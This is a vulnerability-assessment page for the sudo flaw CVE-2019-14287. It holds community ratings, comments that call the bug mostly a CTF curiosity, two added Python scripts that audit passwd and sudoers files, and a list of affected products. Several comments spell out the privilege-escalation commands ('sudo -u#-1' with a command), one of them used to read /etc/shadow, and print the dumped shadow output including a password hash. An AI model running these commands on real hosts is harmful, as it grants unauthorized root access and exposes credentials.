Low
CVE-2019-14287
Description
In Sudo before 1.8.28, an attacker with access to a Runas ALL sudoer account can bypass certain policy blacklists and session PAM modules, and can cause incorrect logging, by invoking sudo with a crafted user ID. For example, this allows bypass of !root configuration, and USER= logging, for a “sudo -u #$((0xffffffff))” command.
Ratings
- Attacker Value: Very Low
- Exploitability: Very High
Technical Analysis
Due to being almost 100% non-existent in the wild, this is only useful in CTF environments. The exploit is extremely easy to trigger, and I weep for the machine that has this configured in the wild.
Ratings
- Attacker Value: Low
- Exploitability: Very High
Technical Analysis
While this is easy to exploit and low risk to the stability of the target system, it is post-exploitation, and highly dependent on a relatively uncommon and paranoid type of configuration where an administrator is actively monitoring trusted or untrusted users on a multi-user system. There may be some way to leverage this as a primitive for a different kind of exploit chain, but more often than not users are allowed to just pivot into root directly, or specific privileged executables are escalated with setuid rather than sudo.
Someone somewhere has that golden target, and is having a field day. Everyone else had root anyway :)
Other related vuln possibilities could be auditing everything that checks UID_MAX / GID_MAX to see if seteuid/setegid failures are detected.
useradd doesn't detect a problem on Linux but adduser does

    /usr/sbin/useradd -d /home/bcook-max -g bcook -s /bin/bash -u 4294967295 bcook-max
    useradd: invalid user ID '4294967295'

vipw is fine with this uid, but su fails

    # grep max /etc/passwd
    bcook-max:x:4294967295:1000::/home/bcook-max:/bin/bash
    ~ # su - bcook-max
    su: cannot set user id: Invalid argument
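The comment above suggests auditing anything that checks UID_MAX / GID_MAX. The script below is an added example (not code from AttackerKB or from the commenter) that does one slice of that audit: it scans passwd-style entries for ids equal to 4294967295 or -1, which is (uid_t)-1 on a 32-bit uid_t and the value setresuid(2)/setresgid(2) interpret as "leave this id unchanged" rather than as a user or group, plus ids that do not fit in 32 bits at all. The sample passwd content is constructed; the `audit_passwd`, `parse_passwd` and `Finding` names are this example's own.

```python
"""Audit /etc/passwd-style entries for ids that collide with (uid_t)-1
or fall outside what a 32-bit uid_t/gid_t can hold.

Added example for this page; not code from AttackerKB or any commenter.
Assumption: ids are 32-bit unsigned, so 4294967295 == (uid_t)-1, the
"no change" sentinel for setresuid(2) and setresgid(2).
"""
import sys
from typing import List, NamedTuple, Optional, Tuple

UID_T_MAX = 2**32 - 1   # (uid_t)-1 on Linux; setresuid/setresgid treat it as "no change"


class Finding(NamedTuple):
    user: str
    value: int        # offending id, or -1 for non-numeric/malformed entries
    reason: str


def parse_passwd(text: str) -> List[Tuple[str, Optional[str], Optional[str]]]:
    """Return (user, uid_field, gid_field) per line; malformed lines get None fields."""
    rows = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:                      # name:pw:uid:gid:gecos:home:shell
            rows.append((f"<malformed line {lineno}>", None, None))
            continue
        rows.append((fields[0], fields[2], fields[3]))
    return rows


def audit_passwd(text: str) -> List[Finding]:
    """Flag entries whose uid or gid is (uid_t)-1 or cannot be represented at all."""
    findings: List[Finding] = []
    for user, uid_field, gid_field in parse_passwd(text):
        if uid_field is None or gid_field is None:
            findings.append(Finding(user, -1, "malformed entry (expected 7 colon-separated fields)"))
            continue
        for label, field in (("uid", uid_field), ("gid", gid_field)):
            try:
                value = int(field, 10)
            except ValueError:
                findings.append(Finding(user, -1, f"non-numeric {label} {field!r}"))
                continue
            if value in (UID_T_MAX, -1):
                findings.append(Finding(user, value,
                                        f"{label} is (uid_t)-1; setres{label}() would treat it as 'no change'"))
            elif value < 0 or value > UID_T_MAX:
                findings.append(Finding(user, value, f"{label} does not fit in a 32-bit id"))
    return findings


# Constructed sample input, modelled on the vipw-created entry shown above.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
bcook:x:1000:1000::/home/bcook:/bin/bash
bcook-max:x:4294967295:1000::/home/bcook-max:/bin/bash
svc-neg:x:-1:-1::/nonexistent:/usr/sbin/nologin
bogus:x:abc:100::/tmp:/bin/sh
broken line without enough fields
"""

if __name__ == "__main__":
    # Audit a real file when given a path, otherwise the constructed sample.
    source = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_PASSWD
    for f in audit_passwd(source):
        print(f"{f.user}: {f.reason}")
```

Run it as `python3 audit_passwd.py /etc/passwd` (or `/etc/group` with the gid column in mind) to catch the case the commenter hit: an entry that vipw accepted but su and setresuid() reject, or, worse, that a setuid program might silently run as its current uid.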
Completely agree. Just like Brent, when I first saw the OMG!!!! Sudo bypass as easy as ‘-u’ I was super concerned, so I tried it out on a fairly stock Ubuntu, a popular Linux distro, and got:
    > sudo -u -1 id
    sudo: unknown user: -1
    sudo: unable to initialize policy plugin
    > sudo -u 4294967295 id
    sudo: unknown user: 4294967295
    sudo: unable to initialize policy plugin
Then I got to the penultimate line of the article I was reading where it said “Since the attack works in a specific use case scenario of the sudoers configuration file, it should not affect a large number of users.”
Come on, people; be honest. Put that line in your opening paragraph! Should you patch? Yes! Should you be concerned this has torn through your mostly stock servers? Nope. The hype this got was way disproportional to the threat. There are far more scary privilege escalations for Linux out there, and this one is pretty easy to patch.
Ratings
- Attacker Value: Low
- Exploitability: Very High
Technical Analysis
I've seen Runas specifications on exactly two servers in the wild. I think it's even rarer that you would specify ALL and !root in the same specification, though it is a better application of the principle of least privilege.
More importantly, privilege escalation is contingent on having access to a command that can escape to a shell or otherwise execute arbitrary code or commands. Cool bug, but the use case for this is minimized.
Here’s a contrived example of the bug in action:
    vagrant@ubuntu-xenial:~$ sudo -l
    Matching Defaults entries for vagrant on ubuntu-xenial:
        env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

    User vagrant may run the following commands on ubuntu-xenial:
        (ALL, !root) NOPASSWD: /usr/bin/whoami
    vagrant@ubuntu-xenial:~$ sudo whoami
    [sudo] password for vagrant:
    Sorry, user vagrant is not allowed to execute '/usr/bin/whoami' as root on ubuntu-xenial.
    vagrant@ubuntu-xenial:~$ sudo -u ubuntu whoami
    ubuntu
    vagrant@ubuntu-xenial:~$ sudo -u#-1 whoami
    root
    vagrant@ubuntu-xenial:~$

You must specify # to use a UID.
Here’s another example where you’re not limited to a command, only the target users:
    vagrant@ubuntu-xenial:~$ sudo -l
    Matching Defaults entries for vagrant on ubuntu-xenial:
        env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

    User vagrant may run the following commands on ubuntu-xenial:
        (ALL, !root) NOPASSWD: ALL
    vagrant@ubuntu-xenial:~$ sudo whoami
    [sudo] password for vagrant:
    Sorry, user vagrant is not allowed to execute '/usr/bin/whoami' as root on ubuntu-xenial.
    vagrant@ubuntu-xenial:~$ sudo -u#-1 whoami
    root
    vagrant@ubuntu-xenial:~$ sudo -u#-1 cat /etc/shadow
    root:*:17897:0:99999:7:::
    daemon:*:17897:0:99999:7:::
    bin:*:17897:0:99999:7:::
    sys:*:17897:0:99999:7:::
    sync:*:17897:0:99999:7:::
    games:*:17897:0:99999:7:::
    man:*:17897:0:99999:7:::
    lp:*:17897:0:99999:7:::
    mail:*:17897:0:99999:7:::
    news:*:17897:0:99999:7:::
    uucp:*:17897:0:99999:7:::
    proxy:*:17897:0:99999:7:::
    www-data:*:17897:0:99999:7:::
    backup:*:17897:0:99999:7:::
    list:*:17897:0:99999:7:::
    irc:*:17897:0:99999:7:::
    gnats:*:17897:0:99999:7:::
    nobody:*:17897:0:99999:7:::
    systemd-timesync:*:17897:0:99999:7:::
    systemd-network:*:17897:0:99999:7:::
    systemd-resolve:*:17897:0:99999:7:::
    systemd-bus-proxy:*:17897:0:99999:7:::
    syslog:*:17897:0:99999:7:::
    _apt:*:17897:0:99999:7:::
    lxd:*:17897:0:99999:7:::
    messagebus:*:17897:0:99999:7:::
    uuidd:*:17897:0:99999:7:::
    dnsmasq:*:17897:0:99999:7:::
    sshd:*:17897:0:99999:7:::
    pollinate:*:17897:0:99999:7:::
    vagrant:$6$pjYWAc.5$QYfO.wN80gnGe2kC1jYmSTGmO/qelG1CMl6ubKMbDQt9b1TEKZ648PQGI7VC88XE3ObdPBswUavsC1eDVZunJ.:17897:0:99999:7:::
    ubuntu:!:18100:0:99999:7:::
    vagrant@ubuntu-xenial:~$

Ratings
- Attacker Value: Very Low
- Exploitability: Very High
Technical Analysis
Patch, but don’t freak out.
Ratings
- Attacker Value: Very Low
- Exploitability: Very High
Technical Analysis
As many others before me have stated, this CVE holds very little use other than in CTF environments.
To spot this vuln, look for a configuration similar to this one in the /etc/sudoers file:

    <user> ALL=(ALL:!root) NOPASSWD: ALL

If the sudo version is below 1.8.28, and the above configuration is present, you can exploit as follows:

    sudo -u#-1 <command>

You can also use the unsigned equivalent of -1: 4294967295.
To test this bug in a preconfigured environment, check out https://tryhackme.com/room/sudovulnsbypass .
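The two preconditions named in the assessments above (a Runas specification of ALL combined with a `!` exclusion, and a sudo older than 1.8.28) are easy to check for mechanically. The script below is an added example, not code from AttackerKB, the sudo project or any commenter: it parses sudoers text for Runas specs of both shapes shown on this page, `(ALL, !root)` and `(ALL:!root)`, and compares the version reported by `sudo -V` against 1.8.28. The sudoers content and version strings are constructed; `audit`, `find_bypassable_runas`, `runas_allows_bypass` and `parse_version` are this example's own names.

```python
"""Flag sudoers Runas specifications that CVE-2019-14287 lets a user bypass
(Runas ALL plus a "!user" exclusion) and check the installed sudo version.

Added example for this page; not code from AttackerKB, the sudo project or
any commenter. Sample sudoers lines and version strings are constructed.
"""
import re
from typing import List, NamedTuple, Tuple

FIXED_VERSION = (1, 8, 28)              # first release with the fix, per the CVE description
RUNAS_RE = re.compile(r"\(([^)]*)\)")   # the "(user_list[:group_list])" part of a user spec


class Finding(NamedTuple):
    lineno: int
    line: str
    reason: str


def parse_version(sudo_v_output: str) -> Tuple[int, ...]:
    """Extract (major, minor, patch) from `sudo -V` output such as 'Sudo version 1.8.21p2'."""
    m = re.search(r"[Ss]udo version (\d+)\.(\d+)\.(\d+)", sudo_v_output)
    if not m:
        raise ValueError(f"no sudo version found in {sudo_v_output!r}")
    return tuple(int(x) for x in m.groups())


def is_vulnerable_version(version: Tuple[int, ...]) -> bool:
    return version < FIXED_VERSION


def runas_allows_bypass(runas: str) -> bool:
    """True when the Runas spec contains ALL together with a '!' exclusion.
    Both separators are split so '(ALL, !root)' and '(ALL:!root)' match."""
    items = [u.strip() for u in re.split(r"[,:]", runas) if u.strip()]
    has_all = any(u.upper() == "ALL" for u in items)
    has_exclusion = any(u.startswith("!") for u in items)
    return has_all and has_exclusion


def find_bypassable_runas(sudoers_text: str) -> List[Finding]:
    """Scan sudoers lines (comments and Defaults skipped) for bypassable Runas specs."""
    findings: List[Finding] = []
    for lineno, raw in enumerate(sudoers_text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#") or line.startswith("Defaults"):
            continue
        m = RUNAS_RE.search(line)
        if m is None:
            continue                          # no Runas spec: the command may only run as root
        if runas_allows_bypass(m.group(1)):
            findings.append(Finding(lineno, line,
                                    "Runas ALL with '!' exclusion; 'sudo -u#-1' reaches uid 0 on sudo < 1.8.28"))
    return findings


def audit(sudoers_text: str, sudo_v_output: str) -> dict:
    """Combine both checks; 'exposed' is True only when version and policy line up."""
    version = parse_version(sudo_v_output)
    findings = find_bypassable_runas(sudoers_text)
    return {
        "version": version,
        "vulnerable_version": is_vulnerable_version(version),
        "findings": findings,
        "exposed": is_vulnerable_version(version) and bool(findings),
    }


# Constructed sample, not a real host's sudoers file.
SAMPLE_SUDOERS = """\
# constructed sample
Defaults env_reset
root    ALL=(ALL:ALL) ALL
%admin  ALL=(ALL) ALL
vagrant ALL=(ALL, !root) NOPASSWD: /usr/bin/whoami
alice   ALL=(ALL:!root) NOPASSWD: ALL
bob     ALL=(www-data, backup) /usr/bin/systemctl restart nginx
"""

if __name__ == "__main__":
    result = audit(SAMPLE_SUDOERS, "Sudo version 1.8.21p2")
    print("sudo", ".".join(map(str, result["version"])),
          "vulnerable" if result["vulnerable_version"] else "fixed")
    for f in result["findings"]:
        print(f"line {f.lineno}: {f.line}\n    {f.reason}")
```

On a live host, feed it `sudo -V` and the output of `visudo -c -f /etc/sudoers` (plus the files under /etc/sudoers.d) rather than the sample. The `bob` line shows the shape that does not depend on the fix: an explicit list of the users a command is meant to run as, instead of ALL minus root, leaves no exclusion for `-u#-1` to step around, which holds whether or not sudo has been upgraded.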
General Information
Vendors
- canonical,
- debian,
- fedoraproject,
- netapp,
- opensuse,
- redhat,
- sudo project
Products
- debian linux 10.0,
- debian linux 8.0,
- debian linux 9.0,
- element software management node -,
- enterprise linux 8.0,
- enterprise linux desktop 6.0,
- enterprise linux desktop 7.0,
- enterprise linux eus 7.5,
- enterprise linux eus 7.6,
- enterprise linux eus 7.7,
- enterprise linux eus 8.1,
- enterprise linux eus 8.2,
- enterprise linux eus 8.4,
- enterprise linux server 5.0,
- enterprise linux server 6.0,
- enterprise linux server 7.0,
- enterprise linux server aus 6.5,
- enterprise linux server aus 6.6,
- enterprise linux server aus 7.2,
- enterprise linux server aus 7.3,
- enterprise linux server aus 7.4,
- enterprise linux server aus 7.6,
- enterprise linux server aus 7.7,
- enterprise linux server aus 8.2,
- enterprise linux server aus 8.4,
- enterprise linux server tus 7.2,
- enterprise linux server tus 7.3,
- enterprise linux server tus 7.4,
- enterprise linux server tus 7.6,
- enterprise linux server tus 7.7,
- enterprise linux server tus 8.2,
- enterprise linux server tus 8.4,
- enterprise linux workstation 6.0,
- enterprise linux workstation 7.0,
- fedora 29,
- fedora 30,
- fedora 31,
- leap 15.0,
- leap 15.1,
- openshift container platform 4.1,
- sudo,
- ubuntu linux 12.04,
- ubuntu linux 14.04,
- ubuntu linux 16.04,
- ubuntu linux 18.04,
- ubuntu linux 19.04,
- virtualization 4.2